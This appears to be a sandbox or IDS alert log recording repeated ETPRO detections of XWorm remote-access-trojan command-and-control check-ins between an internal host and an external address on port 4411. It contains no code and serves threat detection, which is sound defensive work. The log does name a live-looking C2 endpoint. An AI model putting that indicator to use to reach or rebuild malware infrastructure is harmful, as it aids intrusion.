                                2024-12-18T08:16:59.252049+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.325992+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:59.668999+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.669934+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:16:59.958951+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:16:59.959987+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:00.273669+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:00.274717+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:01.670112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:01.861176+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:01.953980+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:02.390921+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:02.694848+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:02.745951+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:03.333935+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:03.336704+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:04.482711+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:04.485525+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:04.673767+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:04.677904+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:04.987325+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:05.038138+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:05.448644+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:05.739584+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:05.740809+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:05.907966+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:05.959867+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:06.051606+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:06.079475+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:06.242553+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:06.253886+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:07.181318+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:07.189082+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:07.799701+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:07.841124+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:07.993773+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:07.994625+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:08.184853+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:08.185709+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:08.306108+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:08.469260+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:10.232269+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:10.464187+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:10.466720+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:10.500987+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:10.777535+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:10.936876+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:11.089830+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:11.094026+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:11.376788+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:11.703615+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:11.739685+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:11.931130+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:11.989162+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:12.050423+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:12.108948+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:12.164175+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:12.527439+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:12.561707+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:13.043015+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:13.045901+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:13.998166+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:14.118072+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:14.157417+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:14.310149+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:14.423615+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:14.428853+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:14.614964+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:14.712226+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:14.734482+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:14.880010+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:14.903163+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:15.005981+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:15.022865+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:15.094349+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:15.095064+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:15.170188+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:16.248297+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:16.302013+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:16.480188+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:16.541494+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:16.612787+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:16.661126+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:16.671147+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:16.822011+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:16.909369+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:16.941621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:17.638767+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:17.684865+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:17.875820+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:17.900676+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:17.950173+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:18.020432+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:18.108287+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:18.140650+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:18.240441+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:18.299294+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:18.299374+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:18.405983+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:19.250639+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:19.251664+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:19.849399+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:19.850480+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:20.040239+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:20.089696+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:20.459478+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:20.502020+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:20.650444+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:20.651923+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:20.813850+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:20.817124+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:20.841668+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:20.940927+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:20.962643+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:21.102061+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:22.092071+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:22.093023+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:22.283164+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:22.334060+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:22.404575+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:22.456582+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:22.756162+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:22.757469+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:22.887452+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:22.888430+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:22.948714+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:23.050075+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:23.731041+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:23.740260+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:23.922125+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:23.941869+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:25.201488+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:25.205185+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:25.392435+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:25.421278+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:27.733469+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:27.757989+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:27.952032+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:27.952931+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:28.184035+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:28.184904+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:28.263893+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:28.304628+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:28.636091+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:28.826388+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:28.827348+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:29.007625+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:29.127280+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:29.138146+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:29.257997+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:29.602159+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:29.664861+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:29.893022+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:30.084272+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:30.168343+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:30.275333+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:30.275492+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:30.941907+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:30.969041+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:31.561427+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:31.562417+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:31.811433+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:31.825731+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:32.169078+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:32.170097+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:32.466178+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:32.482666+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:32.657055+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:32.661946+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:32.888074+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:32.899698+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:33.842355+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:33.985561+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:34.033388+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:34.176810+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:34.298071+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:34.344357+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:34.369268+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:34.370054+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:34.462123+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
                                2024-12-18T08:17:34.487532+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.849708TCP
                                2024-12-18T08:17:34.489622+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.84970892.255.57.1554411TCP
